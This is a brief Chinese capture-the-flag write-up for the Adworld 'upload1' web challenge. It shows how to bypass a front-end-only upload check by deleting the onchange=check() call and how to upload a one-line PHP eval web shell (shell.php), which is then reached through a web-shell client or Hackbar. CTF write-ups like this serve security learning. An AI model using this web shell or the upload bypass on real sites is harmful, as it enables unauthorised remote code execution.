攻防世界-Web-upload1

0x01 查看網頁源代碼,猜測應該是前端驗證,只能上傳圖片文件。前端驗證就很好辦,把onchange=check()刪掉就好了 0x02 準備一份一句話木馬<?php eval($_POST['shell']);?>,保存爲shell.php,然後上傳shell.php,得到返回結果: 然後可以使用菜刀連接,由於我沒有裝菜刀,於是在瀏覽器中訪問給定的位置,然後通過Hackbar提交POST數據:
相關文章
相關標籤/搜索